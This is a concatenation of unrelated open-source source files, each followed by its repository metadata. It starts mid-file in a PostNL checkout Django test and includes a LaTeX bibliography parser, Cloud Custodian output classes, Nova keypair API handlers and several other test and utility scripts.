'Initialen': u'J',
'Geslacht': u'Meneer',
'Deurcode': None,
'Gebruik': u'P',
'Gebouw': None,
'Verdieping': None,
'Achternaam': u'Jansen',
'Afdeling': None,
'Regio': None,
'Land': u'NL',
'Wijk': None,
'Postcode': u'4131LV',
'Straat': 'Lage Biezenweg',
'Bedrijf': None,
'Plaats': u'Vianen',
'Tussenvoegsel': None,
'Voornaam': u'Jan',
'HuisnummerExt': None
}
},
'Webshop': {
'IntRef': u'a0713e4083a049a996c302f48bb3f535'
},
'CommunicatieOpties': {
'ReadOrderResponseCommunicatieOptie': [
{
'Text': u'Do not deliver to neighbours',
'Code': u'REMARK'
}
]
},
'Bezorging': {
'ServicePunt': {
'Huisnummer': None,
'Initialen': None,
'Geslacht': None,
'Deurcode': None,
'Gebruik': None,
'Gebouw': None,
'Verdieping': None,
'Achternaam': None,
'Afdeling': None,
'Regio': None,
'Land': None,
'Wijk': None,
'Postcode': None,
'Straat': None,
'Bedrijf': None,
'Plaats': None,
'Tussenvoegsel': None,
'Voornaam': None,
'HuisnummerExt': None
},
'Geadresseerde': {
'Huisnummer': u'1',
'Initialen': u'J',
'Geslacht': u'Meneer',
'Deurcode': None,
'Gebruik': u'Z',
'Gebouw': None,
'Verdieping': None,
'Achternaam': u'Janssen',
'Afdeling': None,
'Regio': None,
'Land': u'NL',
'Wijk': None,
'Postcode': u'4131LV',
'Straat': u'Lage Biezenweg ',
'Bedrijf': u'E-ID',
'Plaats': u'Vianen',
'Tussenvoegsel': None,
'Voornaam': u'Jan',
'HuisnummerExt': None
}
},
'Opties': {
'ReadOrderResponseOpties': [
{
'Text': u'Congratulat ions with your new foobar!',
'Code': u'CARD',
'Prijs': decimal.Decimal('2.00')
}
]
},
'Order': {
'ExtRef': u'15200_001'
},
'BetaalMethode': {
'Optie': u'0021',
'Code': u'IDEAL',
'Prijs': decimal.Decimal('0.00')
}
})
def test_confirm_order(self):
""" Test confirm_order """
def response(url, request):
self.assertXMLEqual(
request.body, self.read_file('confirm_order_request.xml')
)
return self.read_file('confirm_order_response.xml')
kwargs = {
'Order': {
'PaymentTotal': decimal.Decimal('183.25')
}
}
instance = G(
Order,
order_token='0cfb4be2-47cf-4eac-865c-d66657953d5c',
order_ext_ref='1105_900'
)
# Execute API call
with HTTMock(response):
instance.confirm_order(**kwargs)
def test_update_order(self):
""" Test update_order """
def response_success(url, request):
self.assertXMLEqual(
request.body, self.read_file('update_order_request.xml')
)
return self.read_file('update_order_response_success.xml')
def response_fail(url, request):
self.assertXMLEqual(
request.body, self.read_file('update_order_request.xml')
)
return self.read_file('update_order_response_fail.xml')
kwargs = {
'Order': {
'ExtRef': 'FDK004',
'Zending': {
'UpdateOrderOrderZending': {
'Busstuk': {
'UpdateOrderOrderZendingBusstuk': {
'Verzonden': '23-08-2011 12:00:00'
}
},
'ExtRef': '642be996-6ab3-4a4c-b7d6-2417a4cee0df',
'Pakket': {
'UpdateOrderOrderZendingPakket': {
'Barcode': '3s123456789',
'Postcode': '4131LV'
}
}
}
}
}
}
instance = G(
Order,
order_token='0cfb4be2-47cf-4eac-865c-d66657953d5c',
order_ext_ref='1105_900'
)
# Make call fail
with HTTMock(response_fail):
self.assertRaises(
Exception, lambda: instance.update_order(**kwargs)
)
# Make call pass
with HTTMock(response_success):
response = instance.update_order(**kwargs)
self.assertTrue(response)
# Make sure the requested stuff is saved
self.assertEquals(
instance.update_order_request, {
'Checkout': {
'OrderToken': '0cfb4be2-47cf-4eac-865c-d66657953d5c'
},
'Order': {
'ExtRef': 'FDK004',
'Zending': {
'UpdateOrderOrderZending': {
'Busstuk': {
'UpdateOrderOrderZendingBusstuk': {
'Verzonden': '23-08-2011 12:00:00'
}
},
'ExtRef': '642be996-6ab3-4a4c-b7d6-2417a4cee0df',
'Pakket': {
'UpdateOrderOrderZendingPakket': {
'Barcode': '3s123456789',
'Postcode': '4131LV'
}
}
}
}
}
}
)
def test_ping_status(self):
""" Test ping_status """
instance = G(Order)
self.response_called = 0
def ok_response(url, request):
# Assert
self.assertXMLEqual(
request.body,
self.read_file('ping_status_request.xml')
)
self.response_called += 1
return self.read_file('ping_status_response_ok.xml')
def nok_response(url, request):
return self.read_file('ping_status_response_nok.xml')
with HTTMock(ok_response):
self.assertEquals(instance.ping_status(), True)
self.assertEquals(self.response_called, 1)
# Repeated call should not cause the response to be called
with HTTMock(ok_response):
self.assertEquals(instance.ping_status(), True)
self.assertEquals(self.response_called, 1)
# Clear cache
cache.clear()
with HTTMock(nok_response):
self.assertEquals(instance.ping_status(), False)
|
dokterbob/python-postnl-checkout
|
tests/test_django.py
|
Python
|
agpl-3.0
| 13,320 | 0 |
# bibliography.py
r'''
Defines the BibItem() and Bibliography() classes (both sub-classed from Node)
The Bibliography() object is initialized directly from
a .bib file using the `bibtexparser` package.
We use registry.ClassFactory for unlisted fields
'''
import os
import logging
log = logging.getLogger(__name__)
import re, bibtexparser
from .registry import ClassFactory
from .command import Command
from .content import Text
class BibItem(Command):
def __init__(self, citation_key=None):
Command.__init__(self)
self.citation_key = citation_key
def __repr__(self):
if self.citation_key:
return '{}:{}({})'.format(self.genus, self.species, self.citation_key)
return '{}:{}()'.format(self.genus, self.species)
def harvard_dict(self):
'''
Create a dictionary of fields required for harvard-style citations.
Returns a dict of citation keys mapped onto bibliographic information in the correct format.
The main difficulty is with the 'author' key.
'''
bibtex_tags = ('title', 'author', 'year', 'publisher', 'isbn')
harv = dict()
surnames = list()
initials = list()
for child in self.children:
# deal with author field
if child.species == 'author':
# split on
# (1) authors: delimited by a comma (,) or an 'and', then
# (2) names: delimited by a point (.) or a space
author_str = child.content
author_list = [x.split(' ') for x in re.split(',|and', author_str)]
author_list = [[x.strip() for x in au if x] for au in author_list]
for author in author_list:
surnames.append(author[-1])
initials.append('.'.join([x[0] for x in author[:-1]]) + '.')
names = ['%s, %s' % name for name in zip(surnames, initials)]
harv['author'] = ' and '.join([', '.join(names[:-1]), names[-1]])
# copy bibtex (tag, content) pairs for tags in bibtex_fields
else:
if child.species in bibtex_tags:
harv[child.species] = child.content
# set citation text e.g. (Evans 2012)
if len(surnames) == 1:
harv['citation'] = '(%s, %s)' % (surnames[0], harv['year'])
elif len(surnames) == 2:
harv['citation'] = '(%s & %s, %s)' % (surnames[0], surnames[1], harv['year'])
elif len(surnames) > 3:
harv['citation'] = '(%s et al. %s)' % (surnames[0], harv['year'])
return harv
def harvard(self):
''' print harvard-style item (should be done in a template!) '''
title = ''
author = ''
year = ''
publisher = ''
for child in self.children:
if child.species == 'title':
title = child.content
elif child.species == 'author':
author_str = child.content
auth_list = [x.split('.') for x in re.split(',|and', author_str)]
auth_list = [[x.strip() for x in au] for au in auth_list]
auth_parts = []
for auth in auth_list:
name = auth[-1] + ' ' + '.'.join([x[0] for x in auth[:-1]]) + '.'
auth_parts.append(name)
author = ' and '.join([', '.join(auth_parts[:-1]), auth_parts[-1]])
elif child.species == 'year':
year = child.content
elif child.species == 'publisher':
publisher = child.content
else:
pass
return '%s (%s) %s. %s.' % (author, year, title, publisher)
class Bibliography(Command):
r'''
Bibliography is block command, whose `children` is a list of BibItem objects.
This is an example of a Command whicl logically encloses what follows.
The data is read from a .bib file then parsed into a dictionary by the
`bibtexparser` package.
At the moment it can only pull contents from a single bib file whereas
the command allows for \bibliography{refs1.bib, refs2.bib} etc.
'''
def __init__(self, bibtex_filename=None, LATEX_ROOT=None):
Command.__init__(self)
self.filename = bibtex_filename
if bibtex_filename:
if LATEX_ROOT:
bibtex_filename = os.path.join(LATEX_ROOT, bibtex_filename)
self.read_bibtex_file(bibtex_filename)
def read_bibtex_file(self, bibtex_filename):
if not bibtex_filename[-4:] == '.bib':
bibtex_filename = bibtex_filename + '.bib'
try:
with open(bibtex_filename) as bibtex_file:
chars = bibtex_file.read()
except FileNotFoundError as e:
raise Exception('Bibtex file \'{}\' not found'.format(e.filename))
# call bibtexparser
bibtex_db = bibtexparser.loads(chars)
for entry in bibtex_db.entries:
bibitem = BibItem()
for key, val in entry.items():
if key == 'ID':
bibitem.citation_key = val
else:
node = ClassFactory(str(key), [], BaseClass=Text)()
node.content = val
bibitem.append_child(node)
self.append_child(bibitem)
def chars(self):
'''
The raw format is the original command "\bibliography{refs.bib}"
We are not testing bibtexparser!
'''
return r'\bibliography{{{}}}{}'.format(self.filename, self.post_space)
def add_item(self, bibitem):
if not isinstance(bibitem, BibItem):
Exception('Bibliography objects can only contain BibItem objects')
self.children.append(bibitem)
def harvard(self):
''' string harvard entries together '''
return '\n'.join([x.harvard() for x in self.children])
def test_bibtex():
bibtex_filename = './test_docs/test_article/references.bib'
bib = Bibliography(bibtex_filename)
print(bib.pretty_print())
print(bib.harvard())
print(bib.chars())
if __name__ == '__main__':
test_bibtex()
|
dimbyd/latextree
|
latextree/parser/bibliography.py
|
Python
|
mit
| 6,260 | 0.005591 |
import yaml
header="""
<?xml version="1.0" encoding="UTF-8"?>
<MemInfo Version="1" Minor="0">
<Processor Endianness="Little" InstPath="design/cortex">
<AddressSpace
Name="design_1_i_microblaze_0.design_1_i_microblaze_0_local_memory_dlmb_bram_if_cntlr" Begin="0" End="8191">
<BusBlock>
"""
footer="""
</BusBlock>
</AddressSpace>
</Processor>
<Config>
<Option Name="Part" Val="xc7a35tcsg324-1"/>
</Config>
</MemInfo>
"""
bitlane="""
<BitLane MemType="{type}" Placement="{placement}">
<DataWidth MSB="{msb}" LSB="{lsb}"/>
<AddressRange Begin="0" End="{end_address}"/>
<Parity ON="false" NumBits="0"/>
</BitLane>
"""
remap = [3,2,1,0,7,6,5,4,11,10,9,8,15,14,13,12]
bram = open("bram.yaml", "r")
doc = yaml.load(bram)
bit_pos = 0
bit_width = 2
output = header
# for bram in doc['bram']:
for i in range(len(doc['bram'])):
bram = doc['bram'][remap[i]]
data = dict()
# print bram
data['lsb'] = bit_pos
data['msb'] = bit_pos + bit_width - 1
data['end_address'] = 16383
data['type'] = 'RAMB36E1'
data['placement'] = bram['SITE'].split('_')[1] # remove RAMB36_ in front of the position string
bit_pos += bit_width
output += bitlane.format(**data)
output += footer
print output
|
rbarzic/arty-cm0-designstart
|
synt/yaml2mmi.py
|
Python
|
gpl-2.0
| 1,294 | 0.017002 |
import pytest
import salt.states.openvswitch_port as openvswitch_port
from tests.support.mock import MagicMock, patch
@pytest.fixture
def configure_loader_modules():
return {openvswitch_port: {"__opts__": {"test": False}}}
def test_present():
"""
Test to verify that the named port exists on bridge, eventually creates it.
"""
name = "salt"
bridge = "br-salt"
ret = {"name": name, "result": None, "comment": "", "changes": {}}
mock = MagicMock(return_value=True)
mock_l = MagicMock(return_value=["salt"])
mock_n = MagicMock(return_value=[])
with patch.dict(
openvswitch_port.__salt__,
{
"openvswitch.bridge_exists": mock,
"openvswitch.interface_get_type": MagicMock(return_value='""'),
"openvswitch.port_list": mock_l,
},
):
comt = "Port salt already exists."
ret.update({"comment": comt, "result": True})
assert openvswitch_port.present(name, bridge) == ret
with patch.dict(
openvswitch_port.__salt__,
{
"openvswitch.bridge_exists": mock,
"openvswitch.interface_get_type": MagicMock(return_value='""'),
"openvswitch.port_list": mock_n,
"openvswitch.port_add": mock,
},
):
comt = "Port salt created on bridge br-salt."
ret.update(
{
"comment": comt,
"result": True,
"changes": {
"salt": {
"new": "Created port salt on bridge br-salt.",
"old": "No port named salt present.",
},
},
}
)
assert openvswitch_port.present(name, bridge) == ret
with patch.dict(
openvswitch_port.__salt__,
{
"openvswitch.bridge_exists": mock,
"openvswitch.port_list": mock_n,
"openvswitch.port_add": mock,
"openvswitch.interface_get_options": mock_n,
"openvswitch.interface_get_type": MagicMock(return_value=""),
"openvswitch.port_create_gre": mock,
"dig.check_ip": mock,
},
):
comt = "Port salt created on bridge br-salt."
ret.update(
{
"result": True,
"comment": (
"Created GRE tunnel interface salt with remote ip 10.0.0.1 and key"
" 1 on bridge br-salt."
),
"changes": {
"salt": {
"new": (
"Created GRE tunnel interface salt with remote ip 10.0.0.1"
" and key 1 on bridge br-salt."
),
"old": (
"No GRE tunnel interface salt with remote ip 10.0.0.1 and"
" key 1 on bridge br-salt present."
),
},
},
}
)
assert (
openvswitch_port.present(
name, bridge, tunnel_type="gre", id=1, remote="10.0.0.1"
)
== ret
)
|
saltstack/salt
|
tests/pytests/unit/states/test_openvswitch_port.py
|
Python
|
apache-2.0
| 3,213 | 0.000934 |
# Handy for debugging setup.py
"""Utilities creating reusable, DRY, setup.py installation scripts
Typical usage in setup.py:
>>> global_env, local_env = {}, {}
>>> execfile(join('pug', 'setup_util.py'), global_env, local_env)
>>> get_variable = local_env['get_variable']
"""
import os
def setup(*args, **kwargs):
print('setup() args = {0}'.format(args))
print('setup() kwargs = {0}'.format(kwargs))
def get_variable(relpath, keyword='__version__'):
"""Read __version__ or other properties from a python file without importing it
from gist.github.com/technonik/406623 but with added keyward kwarg """
for line in open(os.path.join(os.path.dirname(__file__), relpath), encoding='cp437'):
if keyword in line:
if '"' in line:
return line.split('"')[1]
elif "'" in line:
return line.split("'")[1]
|
hobson/pug
|
pug/setup_util.py
|
Python
|
mit
| 915 | 0.006557 |
# Copyright 2015-2017 Capital One Services, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Outputs metrics, logs, structured records across
a variety of sources.
See docs/usage/outputs.rst
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import datetime
import gzip
import logging
import shutil
import tempfile
import os
from c7n.registry import PluginRegistry
from c7n.log import CloudWatchLogHandler
from c7n.utils import chunks, local_session, parse_s3, get_retry
DEFAULT_NAMESPACE = "CloudMaid"
log = logging.getLogger('custodian.output')
metrics_outputs = PluginRegistry('c7n.blob-outputs')
blob_outputs = PluginRegistry('c7n.blob-outputs')
@metrics_outputs.register('aws')
class MetricsOutput(object):
"""Send metrics data to cloudwatch
"""
permissions = ("cloudWatch:PutMetricData",)
retry = staticmethod(get_retry(('Throttling',)))
BUFFER_SIZE = 20
@staticmethod
def select(metrics_selector):
if not metrics_selector:
return NullMetricsOutput
# Compatibility for boolean configuration
if isinstance(metrics_selector, bool):
metrics_selector = 'aws'
for k in metrics_outputs.keys():
if k.startswith(metrics_selector):
return metrics_outputs[k]
raise ValueError("invalid metrics option %r" % metrics_selector)
def __init__(self, ctx, namespace=DEFAULT_NAMESPACE):
self.ctx = ctx
self.namespace = namespace
self.buf = []
def get_timestamp(self):
"""
Now, if C7N_METRICS_TZ is set to TRUE, UTC timestamp will be used.
For backwards compatibility, if it is not set, UTC will be the default.
To disable this and use the system's time zone, C7N_METRICS_TZ shoule be set to FALSE.
"""
if os.getenv("C7N_METRICS_TZ", 'TRUE').upper() in ('TRUE', ''):
return datetime.datetime.utcnow()
else:
return datetime.datetime.now()
def flush(self):
if self.buf:
self._put_metrics(self.namespace, self.buf)
self.buf = []
def put_metric(self, key, value, unit, buffer=True, **dimensions):
point = self._format_metric(key, value, unit, dimensions)
self.buf.append(point)
if buffer:
# Max metrics in a single request
if len(self.buf) == 20:
self.flush()
else:
self.flush()
def _format_metric(self, key, value, unit, dimensions):
d = {
"MetricName": key,
"Timestamp": self.get_timestamp(),
"Value": value,
"Unit": unit}
d["Dimensions"] = [
{"Name": "Policy", "Value": self.ctx.policy.name},
{"Name": "ResType", "Value": self.ctx.policy.resource_type}]
for k, v in dimensions.items():
d['Dimensions'].append({"Name": k, "Value": v})
return d
def _put_metrics(self, ns, metrics):
watch = local_session(self.ctx.session_factory).client('cloudwatch')
for metric_values in chunks(metrics, self.BUFFER_SIZE):
return self.retry(
watch.put_metric_data, Namespace=ns, MetricData=metrics)
class NullMetricsOutput(MetricsOutput):
permissions = ()
def __init__(self, ctx, namespace=DEFAULT_NAMESPACE):
super(NullMetricsOutput, self).__init__(ctx, namespace)
self.data = []
def _put_metrics(self, ns, metrics):
self.data.append({'Namespace': ns, 'MetricData': metrics})
for m in metrics:
if m['MetricName'] not in ('ActionTime', 'ResourceTime'):
log.debug(self.format_metric(m))
def format_metric(self, m):
label = "metric:%s %s:%s" % (m['MetricName'], m['Unit'], m['Value'])
for d in m['Dimensions']:
label += " %s:%s" % (d['Name'].lower(), d['Value'].lower())
return label
class LogOutput(object):
log_format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
def __init__(self, ctx):
self.ctx = ctx
def get_handler(self):
raise NotImplementedError()
def __enter__(self):
log.debug("Storing output with %s" % repr(self))
self.join_log()
return self
def __exit__(self, exc_type=None, exc_value=None, exc_traceback=None):
self.leave_log()
if exc_type is not None:
log.exception("Error while executing policy")
def join_log(self):
self.handler = self.get_handler()
self.handler.setLevel(logging.DEBUG)
self.handler.setFormatter(logging.Formatter(self.log_format))
mlog = logging.getLogger('custodian')
mlog.addHandler(self.handler)
def leave_log(self):
mlog = logging.getLogger('custodian')
mlog.removeHandler(self.handler)
self.handler.flush()
self.handler.close()
class CloudWatchLogOutput(LogOutput):
log_format = '%(asctime)s - %(levelname)s - %(name)s - %(message)s'
def get_handler(self):
return CloudWatchLogHandler(
log_group=self.ctx.options.log_group,
log_stream=self.ctx.policy.name,
session_factory=lambda x=None: self.ctx.session_factory(
assume=False))
def __repr__(self):
return "<%s to group:%s stream:%s>" % (
self.__class__.__name__,
self.ctx.options.log_group,
self.ctx.policy.name)
class FSOutput(LogOutput):
@staticmethod
def select(path):
for k in blob_outputs.keys():
if path.startswith('%s://' % k):
return blob_outputs[k]
# Fall back local disk
return blob_outputs['file']
@staticmethod
def join(*parts):
return os.path.join(*parts)
def __init__(self, ctx):
super(FSOutput, self).__init__(ctx)
self.root_dir = self.ctx.output_path or tempfile.mkdtemp()
def get_handler(self):
return logging.FileHandler(
os.path.join(self.root_dir, 'custodian-run.log'))
def compress(self):
# Compress files individually so thats easy to walk them, without
# downloading tar and extracting.
for root, dirs, files in os.walk(self.root_dir):
for f in files:
fp = os.path.join(root, f)
with gzip.open(fp + ".gz", "wb", compresslevel=7) as zfh:
with open(fp, "rb") as sfh:
shutil.copyfileobj(sfh, zfh, length=2**15)
os.remove(fp)
@blob_outputs.register('file')
class DirectoryOutput(FSOutput):
permissions = ()
def __init__(self, ctx):
super(DirectoryOutput, self).__init__(ctx)
if self.root_dir.startswith('file://'):
self.root_dir = self.root_dir[len('file://'):]
if self.ctx.output_path is not None:
if not os.path.exists(self.root_dir):
os.makedirs(self.root_dir)
def __repr__(self):
return "<%s to dir:%s>" % (self.__class__.__name__, self.root_dir)
@blob_outputs.register('s3')
class S3Output(FSOutput):
"""
Usage:
.. code-block:: python
with S3Output(session_factory, 's3://bucket/prefix'):
log.info('xyz') # -> log messages sent to custodian-run.log.gz
"""
permissions = ('S3:PutObject',)
def __init__(self, ctx):
super(S3Output, self).__init__(ctx)
self.date_path = datetime.datetime.now().strftime('%Y/%m/%d/%H')
self.s3_path, self.bucket, self.key_prefix = parse_s3(
self.ctx.output_path)
self.root_dir = tempfile.mkdtemp()
self.transfer = None
def __repr__(self):
return "<%s to bucket:%s prefix:%s>" % (
self.__class__.__name__,
self.bucket,
"%s/%s" % (self.key_prefix, self.date_path))
@staticmethod
def join(*parts):
return "/".join([s.strip('/') for s in parts])
def __exit__(self, exc_type=None, exc_value=None, exc_traceback=None):
from boto3.s3.transfer import S3Transfer, TransferConfig
if exc_type is not None:
log.exception("Error while executing policy")
log.debug("Uploading policy logs")
self.leave_log()
self.compress()
self.transfer = S3Transfer(
self.ctx.session_factory(assume=False).client('s3'),
config=TransferConfig(use_threads=False))
self.upload()
shutil.rmtree(self.root_dir)
log.debug("Policy Logs uploaded")
def upload(self):
for root, dirs, files in os.walk(self.root_dir):
for f in files:
key = "%s/%s%s" % (
self.key_prefix,
self.date_path,
"%s/%s" % (
root[len(self.root_dir):], f))
key = key.strip('/')
self.transfer.upload_file(
os.path.join(root, f), self.bucket, key,
extra_args={
'ACL': 'bucket-owner-full-control',
'ServerSideEncryption': 'AES256'})
|
taohungyang/cloud-custodian
|
c7n/output.py
|
Python
|
apache-2.0
| 9,658 | 0.000207 |
#!/usr/bin/env python
import sys
urllib_urlretrieve = None
try:
# Python 3.x or later
import urllib.request
urllib_urlretrieve = urllib.request.urlretrieve
except ImportError:
# Python 2.x
import urllib
urllib_urlretrieve = urllib.urlretrieve
def download(url, target_path):
urllib_urlretrieve(url, target_path)
if __name__ == '__main__':
if len(sys.argv) != 3:
print 'Usage: python %s url target_path' % sys.argv[0]
sys.exit()
url = sys.argv[1]
target_path = sys.argv[2]
download(url, target_path)
|
knimon-software/ffos-meets-closure
|
tools/sub/download.py
|
Python
|
mit
| 567 | 0 |
from selenium import webdriver
from fixture.session import SessionHelper
from fixture.group import GroupHelper
from fixture.contact import ContactHelper
class Application:
def __init__(self, browser, base_url):
if browser == "firefox":
self.wd = webdriver.Firefox(capabilities={"marionette": False}, firefox_binary="C:/Program Files/Mozilla Firefox/firefox.exe")
elif browser == "chrome":
self.wd = webdriver.Chrome()
elif browser == "ie":
self.wd = webdriver.Ie()
else:
raise ValueError("Unrecognized browser %s" % browser)
self.session = SessionHelper(self)
self.group = GroupHelper(self)
self.contact = ContactHelper(self)
self.base_url = base_url
def is_valid(self):
try:
self.wd.current_url
return True
except:
return False
def open_homepage(self):
wd = self.wd
if not wd.current_url.endswith("addressbook/"):
wd.get(self.base_url)
def destroy(self):
self.wd.quit()
|
schukinp/python_training
|
fixture/application.py
|
Python
|
apache-2.0
| 1,091 | 0.003666 |
# Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Keypair management extension."""
import webob
import webob.exc
from nova.api.openstack import api_version_request
from nova.api.openstack import common
from nova.api.openstack.compute.schemas import keypairs
from nova.api.openstack.compute.views import keypairs as keypairs_view
from nova.api.openstack import wsgi
from nova.api import validation
from nova.compute import api as compute_api
from nova import exception
from nova.objects import keypair as keypair_obj
from nova.policies import keypairs as kp_policies
class KeypairController(wsgi.Controller):
"""Keypair API controller for the OpenStack API."""
_view_builder_class = keypairs_view.ViewBuilder
def __init__(self):
super(KeypairController, self).__init__()
self.api = compute_api.KeypairAPI()
@wsgi.Controller.api_version("2.10")
@wsgi.response(201)
@wsgi.expected_errors((400, 403, 409))
@validation.schema(keypairs.create_v210)
def create(self, req, body):
"""Create or import keypair.
A policy check restricts users from creating keys for other users
params: keypair object with:
name (required) - string
public_key (optional) - string
type (optional) - string
user_id (optional) - string
"""
# handle optional user-id for admin only
user_id = body['keypair'].get('user_id')
return self._create(req, body, key_type=True, user_id=user_id)
@wsgi.Controller.api_version("2.2", "2.9") # noqa
@wsgi.response(201)
@wsgi.expected_errors((400, 403, 409))
@validation.schema(keypairs.create_v22)
def create(self, req, body): # noqa
"""Create or import keypair.
Sending name will generate a key and return private_key
and fingerprint.
Keypair will have the type ssh or x509, specified by type.
You can send a public_key to add an existing ssh/x509 key.
params: keypair object with:
name (required) - string
public_key (optional) - string
type (optional) - string
"""
return self._create(req, body, key_type=True)
@wsgi.Controller.api_version("2.1", "2.1") # noqa
@wsgi.expected_errors((400, 403, 409))
@validation.schema(keypairs.create_v20, "2.0", "2.0")
@validation.schema(keypairs.create, "2.1", "2.1")
def create(self, req, body): # noqa
"""Create or import keypair.
Sending name will generate a key and return private_key
and fingerprint.
You can send a public_key to add an existing ssh key.
params: keypair object with:
name (required) - string
public_key (optional) - string
"""
return self._create(req, body)
def _create(self, req, body, user_id=None, key_type=False):
context = req.environ['nova.context']
params = body['keypair']
name = common.normalize_name(params['name'])
key_type_value = params.get('type', keypair_obj.KEYPAIR_TYPE_SSH)
user_id = user_id or context.user_id
context.can(kp_policies.POLICY_ROOT % 'create',
target={'user_id': user_id})
return_priv_key = False
try:
if 'public_key' in params:
keypair = self.api.import_key_pair(
context, user_id, name, params['public_key'],
key_type_value)
else:
keypair, private_key = self.api.create_key_pair(
context, user_id, name, key_type_value)
keypair['private_key'] = private_key
return_priv_key = True
except exception.KeypairLimitExceeded as e:
raise webob.exc.HTTPForbidden(explanation=str(e))
except exception.InvalidKeypair as exc:
raise webob.exc.HTTPBadRequest(explanation=exc.format_message())
except exception.KeyPairExists as exc:
raise webob.exc.HTTPConflict(explanation=exc.format_message())
return self._view_builder.create(keypair,
private_key=return_priv_key,
key_type=key_type)
@wsgi.Controller.api_version("2.1", "2.1")
@validation.query_schema(keypairs.delete_query_schema_v20)
@wsgi.response(202)
@wsgi.expected_errors(404)
def delete(self, req, id):
self._delete(req, id)
@wsgi.Controller.api_version("2.2", "2.9") # noqa
@validation.query_schema(keypairs.delete_query_schema_v20)
@wsgi.response(204)
@wsgi.expected_errors(404)
def delete(self, req, id): # noqa
self._delete(req, id)
@wsgi.Controller.api_version("2.10") # noqa
@validation.query_schema(keypairs.delete_query_schema_v275, '2.75')
@validation.query_schema(keypairs.delete_query_schema_v210, '2.10', '2.74')
@wsgi.response(204)
@wsgi.expected_errors(404)
def delete(self, req, id): # noqa
# handle optional user-id for admin only
user_id = self._get_user_id(req)
self._delete(req, id, user_id=user_id)
def _delete(self, req, id, user_id=None):
"""Delete a keypair with a given name."""
context = req.environ['nova.context']
# handle optional user-id for admin only
user_id = user_id or context.user_id
context.can(kp_policies.POLICY_ROOT % 'delete',
target={'user_id': user_id})
try:
self.api.delete_key_pair(context, user_id, id)
except exception.KeypairNotFound as exc:
raise webob.exc.HTTPNotFound(explanation=exc.format_message())
def _get_user_id(self, req):
if 'user_id' in req.GET.keys():
user_id = req.GET.getall('user_id')[0]
return user_id
@wsgi.Controller.api_version("2.10")
@validation.query_schema(keypairs.show_query_schema_v275, '2.75')
@validation.query_schema(keypairs.show_query_schema_v210, '2.10', '2.74')
@wsgi.expected_errors(404)
def show(self, req, id):
# handle optional user-id for admin only
user_id = self._get_user_id(req)
return self._show(req, id, key_type=True, user_id=user_id)
@wsgi.Controller.api_version("2.2", "2.9") # noqa
@validation.query_schema(keypairs.show_query_schema_v20)
@wsgi.expected_errors(404)
def show(self, req, id): # noqa
return self._show(req, id, key_type=True)
@wsgi.Controller.api_version("2.1", "2.1") # noqa
@validation.query_schema(keypairs.show_query_schema_v20)
@wsgi.expected_errors(404)
def show(self, req, id): # noqa
return self._show(req, id)
def _show(self, req, id, key_type=False, user_id=None):
"""Return data for the given key name."""
context = req.environ['nova.context']
user_id = user_id or context.user_id
context.can(kp_policies.POLICY_ROOT % 'show',
target={'user_id': user_id})
try:
keypair = self.api.get_key_pair(context, user_id, id)
except exception.KeypairNotFound as exc:
raise webob.exc.HTTPNotFound(explanation=exc.format_message())
return self._view_builder.show(keypair, key_type=key_type)
@wsgi.Controller.api_version("2.35")
@validation.query_schema(keypairs.index_query_schema_v275, '2.75')
@validation.query_schema(keypairs.index_query_schema_v235, '2.35', '2.74')
@wsgi.expected_errors(400)
def index(self, req):
user_id = self._get_user_id(req)
return self._index(req, key_type=True, user_id=user_id, links=True)
@wsgi.Controller.api_version("2.10", "2.34") # noqa
@validation.query_schema(keypairs.index_query_schema_v210)
@wsgi.expected_errors(())
def index(self, req): # noqa
# handle optional user-id for admin only
user_id = self._get_user_id(req)
return self._index(req, key_type=True, user_id=user_id)
@wsgi.Controller.api_version("2.2", "2.9") # noqa
@validation.query_schema(keypairs.index_query_schema_v20)
@wsgi.expected_errors(())
def index(self, req): # noqa
return self._index(req, key_type=True)
@wsgi.Controller.api_version("2.1", "2.1") # noqa
@validation.query_schema(keypairs.index_query_schema_v20)
@wsgi.expected_errors(())
def index(self, req): # noqa
return self._index(req)
def _index(self, req, key_type=False, user_id=None, links=False):
"""List of keypairs for a user."""
context = req.environ['nova.context']
user_id = user_id or context.user_id
context.can(kp_policies.POLICY_ROOT % 'index',
target={'user_id': user_id})
if api_version_request.is_supported(req, min_version='2.35'):
limit, marker = common.get_limit_and_marker(req)
else:
limit = marker = None
try:
key_pairs = self.api.get_key_pairs(
context, user_id, limit=limit, marker=marker)
except exception.MarkerNotFound as e:
raise webob.exc.HTTPBadRequest(explanation=e.format_message())
return self._view_builder.index(req, key_pairs, key_type=key_type,
links=links)
|
openstack/nova
|
nova/api/openstack/compute/keypairs.py
|
Python
|
apache-2.0
| 9,891 | 0 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2020 dl1ksv.
#
# SPDX-License-Identifier: GPL-3.0-or-later
#
from gnuradio import gr, gr_unittest
from PyQt5 import Qt
import sip
# from gnuradio import blocks
try:
from display import text_msg
except ImportError:
import os
import sys
dirname, filename = os.path.split(os.path.abspath(__file__))
sys.path.append(os.path.join(dirname, "bindings"))
from display import display_text_msg
class qa_display_text_msg(gr_unittest.TestCase):
def setUp(self):
self.tb = gr.top_block()
def tearDown(self):
self.tb = None
def test_instance(self):
instance = text_msg('TestString','test',80,None)
b = sip.wrapinstance(instance.pyqwidget(),Qt.QWidget)
def test_001_descriptive_test_name(self):
# set up fg
self.tb.run()
# check data
if __name__ == '__main__':
gr_unittest.run(qa_display_text_msg)
|
dl1ksv/gr-display
|
python/qa_display_text_msg.py
|
Python
|
gpl-3.0
| 951 | 0.005258 |
import os
import unittest
import tempfile
import shutil
from mock import MagicMock, Mock
from catkin_pkg.package_templates import _safe_write_files, create_package_files, \
